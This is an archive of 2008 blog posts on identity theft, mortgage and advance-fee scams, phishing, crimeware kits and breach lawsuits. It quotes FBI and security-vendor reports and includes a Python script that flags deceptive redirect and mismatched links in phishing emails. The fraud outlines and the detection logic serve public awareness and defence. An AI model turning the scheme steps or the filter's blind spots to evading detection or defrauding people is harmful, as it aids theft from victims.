Friday, May 16, 2008

Mortgage scams target the "already unfortunate!"

I guess I'm one of the luckier people out there. When housing prices skyrocketed, I chose to remain happy with my humble digs and watch the frenzy. Now that the bottom has fallen out of the housing boom, at least I'm still semi-whole.

The reason I can only say that I'm semi-whole is that last month I mailed a check to the IRS. In reality, it's probably going to be "proceeds from tax coffers" paying for the mess that was created.

There was fraud in the housing boom. Exactly how much, nobody really knows or is saying. With a lot of desperate people out there -- one thing is for certain -- there are going to be dishonest people approaching them with fraud schemes promising to get them out of their current dilemma.

The FBI just released an interesting report showing fraud trends that contributed to the current financial crisis the housing boom has caused. Its key findings were that mortgage fraud is on the rise, subprime loans contributed to mortgage fraud, the downward trend in housing will continue, and that the current financial crisis is creating a new wave of fraud targeting the people who have already lost their shirts as a result of this crisis.

From the press release on this subject:

The latest mortgage scams run the gamut: from “builder-bailout” schemes where developers unload excess inventory through financial trickery…to foreclosure rescue frauds that trick homeowners into signing over the deed to their house; from seller-assistance scams that use false appraisals to sell homes…to identity theft that leads to home equity credit lines being opened and drained. See the report for more details.

The report lists the two main categories of mortgage fraud:

Mortgage loan fraud is divided into two categories: fraud for property and fraud for profit.

Fraud for property/housing entails misrepresentations by the applicant for the purpose of purchasing a property for a primary residence. This scheme usually involves a single loan. Although applicants may embellish income and conceal debt, their intent is to repay the loan.

Fraud for profit, however, often involves multiple loans and elaborate schemes perpetrated to gain illicit proceeds from property sales. It is this second category that is of most concern to law enforcement and the mortgage industry. Gross misrepresentations concerning appraisals and loan documents are common in fraud for profit schemes and participants are frequently paid for their participation.

The full report, which goes into a lot of detail on current trends, can be seen here.

Besides the latest report, the FBI has a page on their website dedicated to educating the average person on how they might be taken to the cleaners as a result of mortgage fraud.

The page has information on a lot of the recently discovered schemes. Included is a well-written story about a pretty scary phenomenon called, "house stealing."

House stealing is where mortgage fraud meets identity theft.

… The con artists start by picking out a house to steal—say, YOURS. … Next, they assume your identity—getting a hold of your name and personal information (easy enough to do off the Internet) and using that to create fake IDs, social security cards, etc. … Then, they go to an office supply store and purchase forms that transfer property. … After forging your signature and using the fake IDs, they file these deeds with the proper authorities, and lo and behold, your house is now THEIRS.*

Although not considered common, there was a recent case in Southern California involving a variation of this scheme and it involved over 100 homeowners. More recently, the Boston Globe reported that 11 individuals were indicted in a $10.6 million loan fraud scam. Straw buyers and identity theft are part of the formula in this case, also.

And it doesn't only happen in the United States; I've read of this occurring in Canada, also.

The FBI has allocated 200 agents and 33 task forces to investigate mortgage fraud, according to an article in Reuters that quoted FBI Director Robert Mueller. The article mentioned that 19 major corporations are under investigation, and Mueller referred to the FBI's involvement in investigating the Savings and Loan crisis, Enron and WorldCom while delivering his speech.

If you happen to get approached with an offer that seems a little too good to be true (or are suspicious of a past scheme) you can report the matter to the FBI. The people behind these schemes have caused a lot of pain and suffering for a lot of people and besides that, if you pay taxes, you are probably paying for this problem.

Wednesday, May 14, 2008

Another lawsuit filed against Lifelock identity theft protection services in West Virginia

Despite all the publicity that Lifelock continues to do well, a third class action has been filed against them in West Virginia for misleading advertising.

From the PR Newswire release:

Marks & Klein, LLP today filed its third class action lawsuit against LifeLock, Inc., a provider of identity theft protection services, and its CEO Richard "Todd" Davis. The lawsuit was filed in the Circuit Court of Jackson County, West Virginia (Docket No. 08-C-69), on behalf of Kevin Gerhold of Falling Rivers, as well as all other LifeLock subscribers in West Virginia.

This follows similar class actions filed in New Jersey and Maryland.

"The lawsuits allege that LifeLock and its multi-million-dollar advertising campaign provided false and misleading information about the limited level of identity protection the company provides, and failed to warn them about the potential adverse impact the company's services could have on their credit profiles," according to the press release.

Additionally, the release alleges that Lifelock CEO Todd Davis has been a victim of identity theft multiple times since he began using his SSN as a marketing tool to sell the service.

So far only one instance of this has been reported. Here is what I wrote about it in a previous post about pending litigation between Experian and Lifelock:

Shortly thereafter, CEO Todd Davis made headlines when he organized a "posse," complete with film crew, to go after the person who stole his identity to get a loan. The identity thief in question was described as mentally disabled by the authorities, and the charges were dropped because of the questionable tactics used, referred to as coercion.

So far as Lifelock not protecting people from all forms of identity theft, as alleged in all three of these actions, I offered my speculation (opinion) on what that was referring to:

Another reason there is no way to guarantee protection is that not all identity theft shows up on credit bureaus. Some examples of this are in cases of medical benefit fraud, employment fraud, government benefit fraud, some forms of check fraud and last, but not least, when it is used to commit crimes of other than a financial nature.

The press release indicates that other lawsuits are being considered in other States.

An item of interest not disclosed in all the other actions was that a woman had her stolen debit card used to purchase identity theft services from Lifelock:

Beyond the charges leveled in the Complaints, lead counsel Paris related the story of a Wisconsin consumer who contacted the firm regarding her accidental experience with LifeLock. "Her debit card was stolen and the thief had the audacity to use the card to buy a subscription to LifeLock," he noted. "Most disturbingly, LifeLock issued the subscription to the thief in the thief's name, clearly failing to verify the appropriate information."

I guess the person who did this believes in protecting their own identity, at least as long as they aren't paying for it themselves?

The services offered by Lifelock aren't much different from a lot of other services being offered by other companies. This has often led me to wonder whether the actions against Lifelock are only the beginning.

The identity theft protection industry, which is growing at a double-digit rate, has attracted a lot of start-up companies, and it can be difficult for the consumer to determine exactly what they are paying for.

Most of the experts (who aren't selling services) agree that most people can repair their identity for free, and in the long run, they might do a better job of it themselves.

If someone were to do this, a good place would be the FTC's Identity Theft page. Other decent free resources are the Identity Theft Resource Center and the Privacy Rights Clearinghouse.

Tuesday, May 13, 2008

State's top lawman takes a "Don't mess with Texas" approach to fighting identity theft


(Texas Attorney General Greg Abbott)

Texas Attorney General, Greg Abbott, is teaching the business world not to mess with the personal information of Texans.

Using a series of laws that he wrote an essay on, AG Abbott has taken legal action against Radio Shack, CVS Pharmacy, and CNG Financial Corporation, doing business as Check and Go and Southwestern & Pacific Specialty Finance, for not properly protecting people’s information. His office also has pending action against “Select Physical Therapy Texas Limited Partnership and its parent company, Select Medical Corporation, as well as Minnesota-based LifeTime Fitness for improperly discarding customer records,” according to a press release on his site.

Notably, it didn't take a crack team of computer security geeks to crack these cases. In all of these instances, the investigators used an old-fashioned, but often effective, investigative technique called dumpster diving.

Going back to my original premise that there is a lot of unprotected information being compromised too easily, these cases represent how much low hanging fruit is available to identity thieves.

This probably wouldn’t surprise anyone who has taken a look at Attrition.org’s Data Loss Database - Open Source. Fairly frequently, mass amounts of information go missing for not very "technical" reasons.

On Tuesday, the Texas AG site announced a new tool to assist Texans in recovering from becoming an identity theft victim:

The Attorney General’s Identity Theft Victim’s Kit offers a step-by-step priority checklist that victims can use as soon as possible to prevent further damage. Once the identity theft has been confirmed, for example, victims should quickly close all bank, credit, utility and service accounts. Next, victims should contact one of the major credit bureaus and request that fraud alerts or security freezes be placed on their credit reports. This action prevents new accounts from being opened fraudulently under victims’ names.

Also mentioned in the press release is that it still pays to report identity theft to the Federal Trade Commission. They point out that, "many creditors will accept this affidavit on victims’ behalf in lieu of a police report about the crime."

They also point out something that I think is even more important:

A recent trend among identity thieves suggests the criminal may use victims’ personal information to obtain a driver’s license, file for bankruptcy, seek Social Security benefits or apply for a passport. In such cases, the Identity Theft Victim’s Kit instructs victims to immediately contact any government agencies approached by identity thieves.

A lot of people have been led to believe that the final solution to preventing identity theft is to monitor their credit reports. Unfortunately, a lot of this has been driven by advertising campaigns from some of the pay-for-protection identity theft services.

Identity theft isn't only a problem in financial crimes. Criminals steal identities to work, obtain government benefits and to commit a wide range of "other than financial crimes."

Critics of the pay-for-protection industry have often pointed out that these paid services, although convenient, accomplish what a person could do free of charge themselves. Since it is an unregulated industry, the services also offer varying levels of protection.

Some of these services are far better than others, and if you decide to go shopping for one, the term "caveat emptor" (buyer beware) is a wise principle to apply.

This site, http://www.texasfightsidtheft.gov/index.shtml, offers one click access to all the steps a person needs to take to recover from becoming an identity theft victim. It also offers a lot of resources that a prudent person can use to prevent identity theft.

After reviewing this site, I noted that it could be used by just about anyone residing in the United States of America.

In closing, the approach taken by Attorney General Abbott and his office is refreshing and a lot of other elected officials would benefit from studying what I consider a "no nonsense" approach to combating identity theft.

Sunday, May 11, 2008

Symantec May Spam Report reveals IRS e-mail leads to vampire game?

Symantec just released its monthly spam report. I always find these reports a valuable tool to see exactly what trends the cybercriminal and less than ethical e-commerce communities have been up to in the past month.

Although most of us view spam as a major nuisance, the fact remains that spam is the preferred vehicle of marketing garbage and ripping off human beings on the Internet.

This month continues a nasty trend where spammers and phishermen (identity and information thieves) continue to manipulate Google's search engine:

For some time, spammers have used reputable brands to try and deliver spam and phishing messages to end-users. In the last year, Google has become a favorite target for some spammers. In November 2007, Symantec reported the emergence of a technique where spammers manipulated Google’s advanced search query and the “I’m feeling lucky” option to direct users to a spam site. In February 2008, Symantec reported that spammers had manipulated parameters in Google URLs used for AdSense and redirected unsuspecting end-users to a spam website. In April 2008 phishing emails purporting to come from the Google AdWords service have emerged. Google AdWords is a service that allows advertisers to intelligibly connect with individuals who search using Google. In the Google AdWords phishing samples that have emerged, the end-user is encouraged to click on a link to update their billing information and/or renew their account. The link in these phishing emails leads to a fraudulent website where personal information is requested and harvested.

Spear phishing, where specific people are targeted, arrived in inboxes in the form of fake government subpoenas addressed to corporate executives. Also seen were come-ons to become a movie star, spam being sent in the form of instant messages, and the 419 (advance fee) boys inserting calendar reminders in their spam to remind people to send them their money.

While closely related to the long known use of job sites to gather information to commit identity theft, a new twist has been noted where professional networking sites are used for this purpose, also.

From the May report:

One of the side effects stemming from the growth of personal and professional networking sites is the increase in unsolicited emails that operate under the guise of connecting business professionals with their peers. The recipient is asked to join the “inner circle” and is encouraged to supply the network with their professional history by clicking on a URL which brings the user to a registration page. The page requests personal information that could be used for identity theft and could fuel future spam attacks.

In these monthly reports, Symantec normally has one twist with a particularly ghoulish or amusing angle. This month is no exception and they are reporting an IRS spam campaign that leads to a site where you can raise a vampire from the dead:

This time, instead of the refund link taking you to a site to steal your credentials, the link takes you to a popular web-based game in which you incarnate a vampire. The vampire gains more power every time end-users click on his link. It’s a rough, dark world out there… be warned.

I found this especially ironic because scammers and spammers are often referred to as ghouls or vampires when being described in literary terms. So far as the connection to all of this with the IRS, I'll leave that to the reader's imagination.

The IRS having their name spammed is nothing new. As predicted, there is an IRS spam (phishing) campaign going on right now using the tax stimulus program as a come-on to steal personal and financial information, which will probably be used to commit financial crimes. I'm predicting this might be a topic of interest on the June Spam Report.

The full report on the State of Spam for the month of May may be seen courtesy of Symantec, here.

FBI reports tax stimulus phishing campaign underway

The FBI Cyber Investigations Division issued a press release that spammers are phishing for people's personal details using the tax stimulus program as bait.

The Federal Bureau of Investigation warns consumers of recently reported spam e-mail purportedly from the Internal Revenue Service (IRS) which is actually an attempt to steal consumer information. The e-mail advises the recipient that direct deposit is the fastest and easiest way to receive their economic stimulus tax rebate. The message contains a hyperlink to a fraudulent form which requests the recipient's personally identifiable information, including bank account information. To convince consumers to reply, the e-mail warns that a failure to complete the form in a timely manner will delay the issuance of the rebate check.

My guess is that the intent in getting your bank account information is to take it over and drain it of all its assets.

Please note that phishing normally requires a person to willingly give up their information, but more and more a new phenomenon called a drive-by infection is being seen in the "wild," a.k.a. the Internet.

I wrote about this recently in a post called, "Nowadays, all you need to do is visit the wrong site to have your personal information stolen! "

As noted in the post, the phishermen have been seen using social engineering ploys, along with malicious software in conjunction with each other.
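The two link tricks described above, a reputable Google URL that bounces the reader somewhere else (the Symantec report) and an "IRS" form link whose real destination is not the IRS (the FBI release), can both be caught by looking at the links themselves before anyone clicks. The check below is an added example written for this post, not code from Symantec, the FBI or the IRS. The sample e-mail body and every host in it are constructed, and the assumption that the "btnI" query parameter is what drives Google's "I'm feeling lucky" jump is mine.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Hosts the filter treats as reputable. A link to one of these is not suspicious
# by itself; what matters is whether it bounces the reader somewhere else.
TRUSTED_REDIRECTORS = {"google.com", "www.google.com"}

# Constructed sample of a stimulus-rebate phish body (not a real message).
SAMPLE_EMAIL = """
<p>Direct deposit is the fastest and easiest way to receive your economic
stimulus rebate. Failure to complete the form will delay your check.</p>
<a href="http://www.google.com/url?q=http://stimulus-rebate.example.net/form&sa=D">Submit your direct deposit form</a>
<a href="http://www.google.com/search?q=stimulus+rebate+example&btnI=I">Verify your eligibility</a>
<a href="http://203.0.113.7/irs/rebate.php">https://www.irs.gov/individuals/rebate</a>
<a href="https://www.irs.gov/">IRS.gov</a>
"""

ANCHOR_RE = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def _host(url):
    """Lower-cased hostname of a URL, or '' if it has none or is malformed."""
    try:
        return (urlparse(url).hostname or "").lower()
    except ValueError:
        return ""


def inspect_link(href, text):
    """Return (finding, detail) tuples for one anchor; an empty list means clean."""
    findings = []
    host = _host(href)
    if host in TRUSTED_REDIRECTORS:
        qs = parse_qs(urlparse(href).query)
        # Assumption: btnI is the "I'm feeling lucky" parameter. It jumps
        # straight to the top result for q, so the real destination is not
        # in the URL at all; flag it and record the query instead.
        if "btnI" in qs:
            findings.append(("feeling-lucky-redirect", " ".join(qs.get("q", []))))
        # Any parameter carrying a full URL to a non-Google host is a bounce.
        for values in qs.values():
            for value in values:
                value = unquote(value)
                if value.startswith(("http://", "https://")):
                    target = _host(value)
                    if target and target != "google.com" and not target.endswith(".google.com"):
                        findings.append(("external-redirect", target))
    # Anchor text that is itself a URL must point where it claims to.
    shown = text.strip()
    if shown.startswith(("http://", "https://")):
        shown_host = _host(shown)
        if shown_host and shown_host != host:
            findings.append(("text-href-mismatch", f"{shown_host} -> {host}"))
    return findings


def inspect_html(html):
    """Map every href in an HTML body to its findings."""
    return {href: inspect_link(href, text) for href, text in ANCHOR_RE.findall(html)}


if __name__ == "__main__":
    for href, findings in inspect_html(SAMPLE_EMAIL).items():
        print(href, findings or "clean")
```

The first two links are flagged even though they sit on google.com, which is exactly why spammers use them: a reputation-based filter that only looks at the link's own host passes them. The third is the FBI pattern, a link that reads as irs.gov but lands on a bare IP address; the genuine irs.gov link comes back clean.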

If you want to learn more via FBI recommended educational tools, or report a phishy e-mail, here is a way you may do so:

Please notify the IC3 by filing a complaint at www.ic3.gov. More information on scams is also available on www.fbi.gov and www.lookstoogoodtobetrue.com.

You can also report IRS-related phishing scams to phishing@IRS.gov, here.

FBI press release with example of one of the phishmails, here.

In case you want to see when you are going to get your "actual" stimulus check (if you qualify), the IRS has a tool to figure it all out on their site.

Wednesday, May 07, 2008

Stolen information from 40 financial and medical institutions discovered on rogue server

Once in a while, I speculate that stolen information is a lot more valuable to the criminal element before it becomes apparent that it's been stolen. I've also speculated aloud that there is probably a lot more stolen information out there than we are aware of. The good folks at Finjan are well on their way to substantiating this speculation.

Yesterday, they announced the following on their malicious page of the month:

While we were examining malicious code, we came across a domain which was being used as a command and control for the Crimeware that was executed on attacked machines. The domain was also used as the “drop site” for private information being harvested by that Crimeware.

When we further examined this server, we found the stolen data left unprotected and available for anyone on the web (i.e. no access restrictions, no encryption whatsoever).

The server that we analyzed contained more than 1.4Gb of data (both business and personal related) collected from infected PCs, which consisted of 5,388 unique log files, that were traced back to 5,878 distinct IP addresses. Both email communications and web related data were found.

The information discovered was from 40 unnamed financial and medical institutions on several different continents. The server used to store this information was being moved frequently, but when found, anyone could access it.

They made the observation that last year, according to the statistics available, 8.5 million records were compromised. One of these statistics, obtained from IC3, states that 20 percent of the 206,884 cases (roughly 40,000) were due to computer hacking. Finjan points out that on this one server alone they discovered approximately 5,000 records.

I’ll let the reader do their own math, but if this is true there is probably a lot of unknown hacking activity happening in the wild.

Please note that all the kind people compiling statistics only know what is reported to them, and some of them have been very vocal in pointing this out. My personal guess is that there is so much stolen information out there that when any individual case is investigated, it’s almost impossible to do more than speculate, exactly where the point of compromise occurred.

Besides that, hackers are unlikely to want to reveal where they are stealing all their information from. Once revealed, it’s harder to use and not worth as much money.

The information on the server included compromised medical information, online banking information (including passwords) and complete logs of payment card (debit/credit) transactions, including CVV2 information and miscellaneous “extras.” This all occurred on “supposedly” secure sites.

I found this interesting because merchants have been under fire over compliance with the PCI data security standards in light of a few highly publicized data breaches. Of course, in the recent Hannaford case, they were compromised despite having been certified as PCI compliant. The PCI data security standards are the payment card industry's own standards for protecting information.

Based on these findings, hackers don’t have to compromise a merchant to steal everything they need to commit financial crimes and it’s pretty obvious that financial institutions are being compromised, also.

Also found on the server was a lot of business proprietary information harvested from a lot of internal e-mail accounts. In the past year or so there seems to have been a lot of campaigns to obtain other than financial information from businesses. The clear intent in this activity is corporate espionage (my speculation).

Finjan reports that this particular theft campaign was made possible with a do-it-yourself (DIY) crimeware kit called the AdPack Toolkit. They also reported that this kit gives the user command and control functions, enabling them to execute admin functions through the illicit software.

Finjan is not revealing (they never do) exactly which institutions were compromised. Even though they are not revealing names, they did report the activity to law enforcement and the institutions involved.

Saturday, May 03, 2008

Truston ID Theft protection and recovery platform rakes in another award!

It appears that Tom Fragala and the MyTruston team have raked in (yet) another award. This time from the Pacific Coast Business Times as one of the hot start-up companies coming from California's Central Coast.

Tom Fragala, Truston's CEO wrote on his blog, "This recognition comes on the heels of being named a 2008 Hot Company and receiving a technology award from the Info Security Products Guide."

Here is why they were chosen:


Truston's MyTruston® service is the only fully online identity theft recovery system. It is web-based software that can help millions of people easily recover from and prevent identity fraud by supporting virtually any type of ID theft. MyTruston walks consumers step-by-step through the entire prevention or recovery process—dramatically reducing the time, financial cost, and emotional impact. And it can easily be embedded into a partner's own website on a private-label basis.


The press release also contains a comment from Tom Fragala, CEO of Truston:


“The Pacific Coast Business Times recognition of Truston as one of the hottest startups in Central California further validates our innovative products and strategy of offering our services to large partners in the identity theft, direct marketing and financial services markets,” said Tom Fragala, CEO and founder at Truston. “Superior technology and support for partners differentiates Truston from other companies in the identity theft protection market.”


Tom developed Truston based on his own personal experience as an identity theft victim and has spent thousands of hours assisting other victims of identity theft.

Because of this, and even though he is selling this technology to large partners, he still takes care of us "little people" by offering a free 45-day trial (no credit card needed) of the Truston platform.

Saying that, I should mention that the platform has always protected people free of cost and only charges for using it to recover after a person is a confirmed identity theft victim. Most companies charge you right from the beginning and will only help you if you were paying at the time of the crime (pardon the pun). Many of them also require that you surrender all your personal details, which they maintain in a database. Databases are a favorite place for identity thieves to obtain the resources they need to commit their crimes.

There are some, who believe one of the root causes of identity theft is the multi-billion dollar business of buying and selling information, which is normally maintained in databases.

If you are interested in checking out the Truston platform while it is still free, I've provided a link, here.

Does the proposed class action settlement in the Certegy data breach case lack teeth?

I happened to notice I was getting a lot of hits on some posts about the Certegy data breach and discovered that there is a proposed settlement in the class action lawsuit against them.

Tim Wilson at Dark Reading pointed out that this settlement amounts to Certegy paying less than $1 per victim and wrote:

Certegy Check Services is proposing to settle a class action lawsuit of last year's security breach on behalf of 8.4 million victims for about $4 million.

According to a report in the St. Petersburg (Fla.) Times, Certegy will also offer free credit monitoring services to some victims and reimbursement of credit monitoring expenses totaling $1 million on a first-come-first-served basis.

He also surmised in his article that:

While plaintiffs' lawyers hailed the offer as a victory, critics said the relatively small settlement will not help the cause of identity protection. The massive TJX breach also resulted in a relatively small settlement for the victims, netting about $6.5 million for customers.

Of note, I would imagine the plaintiffs' lawyers made A LOT more than $1 each for orchestrating this event. In all fairness, the precedent set by similar actions might mean there isn't a very "deep pocket" on this type of action.

At $1 million for monitoring divided by 8.4 million potential victims, if any of them want the free monitoring, they better move quickly.

So far as the $4 million being set aside to make victims whole, I wonder how hard it is going to be for them to prove (as required by this settlement) that Certegy was the point-of-compromise in their case? The general rule of thumb is that identity thieves, even if they are caught (rare), probably aren't 100 percent sure where the information came from themselves. There is so much stolen information out there, it's being traded over the Internet.

The sad truth is that with all the data breaches out there, it might be hard to prove exactly where an identity theft victim's information was compromised.

So far as the criminal prosecution of the employee, one William Sullivan, who sold off 8.5 million people's records, I did a post in November about how he was able to make a plea bargain and get a reduced sentence in this case. There was a mention of a data broker being a co-conspirator, but they never seemed to be named (at least in public).

Personally, I've always had mixed feelings about lawsuits that result when data breaches occur. There is an argument that at least some (my opinion) of the organizations being breached are victims in the overall equation, also.

Saying that, if this class action and the one for TJX have set the legal precedent for this type of action, they are unlikely to serve as much of a deterrent against data breaches, or all the identity theft that results from them. Furthermore, the criminal prosecution of William Sullivan in his case is unlikely to be much of a deterrent, either.

In fact these results are probably going to do little to inspire organizations to protect their information better and for some, will probably be viewed as a cost of doing business.

I guess it's time to go back to the drawing board to figure out a way to effectively address information/identity theft and data breaches?

Here are the original posts I did on this matter, which contain some angry commentary from more than one victim:

Not to worry, check processing company (Certegy) believes the 2.3 million stolen records will not be used for fraud!

Certegy reveals their data breach is a lot larger than originally reported

Class action law suit filed against Certegy for data breach

Friday, May 02, 2008

Federal Reserve proposes reforms on credit card rules

Credit card fees, which a lot of consumer groups have called out as unfair and abusive, are in the news again. Today, the Federal Reserve Board proposed changes that some believe have been a long time coming.

From the Federal Reserve's press release:

The Federal Reserve Board on Friday proposed rules to prohibit unfair practices regarding credit cards and overdraft services that would, among other provisions, protect consumers from unexpected increases in the rate charged on pre-existing credit card balances.

Without going into the regulations governing this, here is what is being proposed:

Banks would be prohibited from increasing the rate on a pre-existing credit card balance (except under limited circumstances) and must allow the consumer to pay off that balance over a reasonable period of time.

Banks would be prohibited from applying payments in excess of the minimum in a manner that maximizes interest charges.

Banks would be required to give consumers the full benefit of discounted promotional rates on credit cards by applying payments in excess of the minimum to any higher-rate balances first, and by providing a grace period for purchases where the consumer is otherwise eligible.

Banks would be prohibited from imposing interest charges using the "two-cycle" method, which computes interest on balances on days in billing cycles preceding the most recent billing cycle.

Banks would be required to provide consumers a reasonable amount of time to make payments.

Subprime credit card products are also being addressed by limiting the fees that can be automatically applied to a balance. Greater transparency on interest rates and credit limits is being proposed, also.

ConsumersUnion.org issued a press release the day before the Federal Reserve did offering a mixed reaction to the proposal:

"It’s about time federal regulators offered consumers some relief from unfair bank practices," said Consumers Union Financial Services Campaign manager Gail Hillebrand. "This proposed rule finally acknowledges that some practices just aren’t fair. All the disclosure in the world can’t make it fair to send the bill too close to the due date; to raise the interest rate on money already borrowed: or to charge a fee for a problem caused by the bank’s practice to allow a credit hold or a debit hold.”

The proposed rules respond to a sustained outcry from consumers and strong interest in Congress in credit card reform and in reform of bank account practices such as overdraft loans.
Consumers Union praised the approach of the proposed rule to ban, not just require more disclosure about, some of the worst credit card practices.

They also issued a press release on April 30th commending Senator Dodd, the Senate Banking Committee Chairman, for introducing the Credit Card Accountability, Responsibility and Disclosure Act.

ConsumersUnion.org has long been critical of the credit card industry and has an ongoing campaign to bring about reforms to the industry.

Federal Reserve press release, here.

Thursday, May 01, 2008

Internet Gangstas don't appreciate software piracy, either!

Crimeware salesmen, like most e-commerce types, take a dim view when their creations are knocked-off (pirated). To protect themselves, they warn their customers (Internet criminal types) that if their products are counterfeited, they can and will be reported to the anti-virus companies.

Specifically, the verbiage used as reported on the Symantec blog is, "the binary code of your bot will be immediately sent to antivirus companies."

The reason that reporting the binary code of a bot defeats the crimeware kit in question (Zeus) was explained in a previous post on this blog:

Known as the "Zeus kit," in honor of the Zeus Trojan, the kit is fairly resistant to security software because it comes with a binary generator (a builder) that produces a differently encoded executable every time it is run. Anti-virus programs mostly rely on spotting fixed byte patterns, known as "signatures," and those patterns change from one build to the next. Even if a security program recognizes one build, the next one will probably slip past it.

Here are the details, as reported on the Symantec blog by Liam OMurchu:

Here is a perfect example. The screen shot below is taken from a typical underground software package. Shown in the screen shot are the terms and conditions of the sale—the “licensing agreement.” Yes, that’s right; some underground packages come with a licensing agreement. The document is written in Russian, but a translation is provided below.



2. The Client:
1. Does not have the right to distribute the product in any business or commercial purposes not connected with this sale.
2. May not disassemble / study the binary code of the bot builder.
3. Has no right to use the control panel as a means to control other bot nets or use it for any other purpose.
4. Does not have the right to deliberately send any portion of the product to anti-virus companies and other such institutions.
5. Commits to give the seller a fee for any update to the product that is not connected with errors in the work, as well as for adding additional functionality.

In cases of violations of the agreement and being detected, the client loses any technical support. Moreover, the binary code of your bot will be immediately sent to antivirus companies.


It should be noted, as I've written frequently, that these crimeware kits make it fairly easy for not very technical criminals to commit technical crimes. As the licensing agreement shows, the criminals selling these kits in underground forums even provide technical support.

Interestingly enough, Liam noted:

Despite the clear licensing agreement and the associated warnings, this package still ended up being traded freely in underground forums shortly after it was released. It just goes to show you just can’t trust anyone in the underground these days.

Of course, in most instances, there is no honor among thieves.

Liam notes that this licensing agreement is for the much-talked-about Zeus kit, which has "drive-by" capabilities. If you are unfamiliar with the term, a "drive-by" infection means your computer only needs to visit a site to become infected; no download or click is required.

Here is a previous post I did recently about the "drive-by" problem, which is making the Internet a more dangerous place all the time:

Nowadays, all you need to do is visit the wrong site to have your personal information stolen!

Liam's post on the Symantec blog, here.

Sunday, April 27, 2008

DOJ announces strategy to go after organized crime in a borderless environment

I've often written about borderless crime being committed with the click of a mouse, as well as about the jurisdictional lines law enforcement must work within, which can make investigation and prosecution frustrating.

The Attorney General and the Justice Department are announcing a new strategy to go after the problem.

From the press release on fbi.gov:

Today, Attorney General Michael B. Mukasey announced a new strategy in the fight against international organized crime that will address this growing threat to U.S. security and stability. The Law Enforcement Strategy to Combat International Organized Crime (the strategy) was developed following an October 2007 International Organized Crime Threat Assessment (IOC Threat Assessment) and will address the demand for a strategic, targeted, and concerted U.S. response to combat the identified threats. This strategy builds on the broad foundation the Administration has developed in recent years to enhance information sharing, and to secure U.S. borders and financial systems from a variety of transnational threats.

In the press release, Attorney General Mukasey sums up the threat by saying:

The strategy specifically reacts to the globalization of legal and illegal business; advances in technology, particularly the Internet; and the evolution of symbiotic relationships between criminals, public officials, and business leaders that have combined to create a new, less restrictive environment within which international organized criminals can operate. Without the necessity of a physical presence, U.S. law enforcement must combat international organized criminals that target the relative wealth of the people and institutions in the United States while remaining outside the country.

Also stated in the press release is that there will be more coordination of information between federal law enforcement agencies. "This unprecedented coordination will include utilizing all available U.S. government programs and capabilities, including existing economic, consular, and other non-law enforcement means," according to Attorney General Mukasey.

The press release identifies and defines the following strategic threats:

International organized criminals have penetrated the energy market and other strategic sectors of the U.S. and world economy. As U.S. energy needs continue to grow, so too could the power of those who control energy resources.

International organized criminals provide logistical and other support to terrorists, foreign intelligence services, and foreign governments, all with interests acutely adverse to those of U.S. national security.

International organized criminals traffic in people and contraband goods, bringing people and products through U.S. borders to the detriment of border security, the U.S. economy, and the health and lives of those human beings exploited by human trafficking.

International organized criminals exploit the U.S. and international financial system to move illegal profits and funds, including sending billions of dollars in illicit funds through the U.S. financial system annually. To continue this practice, they seek to corrupt financial service providers globally.

International organized criminals use cyberspace to target U.S. victims and infrastructure, jeopardizing the security of personal information, the stability of business and government infrastructures, and the security and solvency of financial investment markets.

International organized criminals are manipulating securities exchanges and engaging in sophisticated fraud schemes that rob U.S. investors, consumers, and government agencies of billions of dollars.

International organized criminals have successfully corrupted public officials around the world, including in countries of vital strategic importance to the United States, and continue to seek ways to influence—legally or illegally—U.S. officials.

International organized criminals use violence and the threat of violence as a basis of power.

What alarmed me the most in this news release, especially with oil prices out of control, was that organized crime is involved in the energy sector. Randall Mikkelsen at Reuters must have been interested in this statement too, and questioned Alice Fisher, head of the DOJ criminal division, about it. Fisher seemed to downplay the statement, saying "I don't think that you can directly link the two." Fisher did go on to state that organized crime had a foothold in global financial markets.

To me, that's at least as scary as organized criminals being involved in the energy sector. What we do know is that both the financial and energy sectors seem to be causing the average citizen a considerable amount of pain and suffering, lately.

The reason for this response might be that investigative agencies generally don't want to comment on the specifics of ongoing investigations. There are good reasons for not doing so.

Interestingly enough, the Organised Crime and Corruption Reporting Project, which is run by Eastern European journalists, has covered potential organized-crime involvement in the energy sector in Eastern Europe. In a story on the home page of the site, it states:

In between are the energy traders. They say they are the future of low-cost energy but that is a promise yet to be fulfilled. These politically connected and well-financed businessmen have reaped billions in sales, often at the expense of state companies. Investigators in a number of countries are trying to determine whether some of them made their millions in profits illegally or legally in systems that have few laws and not enough regulations.

Although the executives at Enron were never found to be involved with organized crime, the Enron debacle illustrates how a little dishonesty in the energy sector can create a lot of financial havoc for a lot of people.

Also alarming is the statement that public officials around the world are being corrupted by these groups.

As I stated in the first paragraph, I've often written about some of the items now being identified as strategic threats. We live in a society where identities are stolen en masse, counterfeiting is rampant and reports of foreign governments hacking into military and industrial systems surface too frequently.

And as far as hacking goes, criminal organizations, which seem to be run as efficiently as any successful corporation, appear able to crack whatever defenses the good guys put in place. There has been speculation that these groups can afford to recruit the best and the brightest in a lot of "disciplines" besides information technology.

These factors have also enabled a lot of other (even more dangerous) criminal activity to spread at what some consider epidemic proportions.

Given all these trends, the only strategy likely to succeed is to go after the people behind it. Nothing else has worked very well, at least so far!

The full press release can be seen, here.

Reuters story can be seen, here.

I would also like to thank Suad and Lazarus at Paper Weapons, Heike at The Dark Visitor (information on Chinese hacking) site and the journalists at the Organised Crime and Corruption Reporting Project for the links, which I seeded in this post to make a point.

Friday, April 25, 2008

80 year old man loses over $700,000 to advance fee (419) scammers

With spam e-mails offering too-good-to-be-true come-ons filling up our mailboxes, we often forget that there are very real people who get victimized after falling for one of them.

Of course, with the availability of botnets, which command legions of spam-spewing zombies (compromised computers), even if only a few people fall for the scheme the scammers still make a tidy sum off other people's misfortunes.

An example can be found on the Newport Beach Police website, where an elderly gentleman lost a lot of money (probably his life savings) to one of these schemes:

Recently, an 80 year old resident of the city learned he was a victim of an international lottery scam. He originally received an email claiming he had won an overseas lottery which required him to pay a processing fee to have the funds released. This scam continued for a two year period and ended with the victim losing over $700,000.00.

Scam operators (often based in Canada) are using email, telephone and direct mail to entice U.S. consumers to buy chances in high-stakes foreign lotteries from as far away as Australia and Europe. These lottery solicitations violate U.S. law, which prohibits the cross-border sale or purchase of lottery tickets by phone or mail.
This type of scam is often referred to as an advance fee (419) scam: the victim is asked to pay fees up front to release winnings that never arrive.

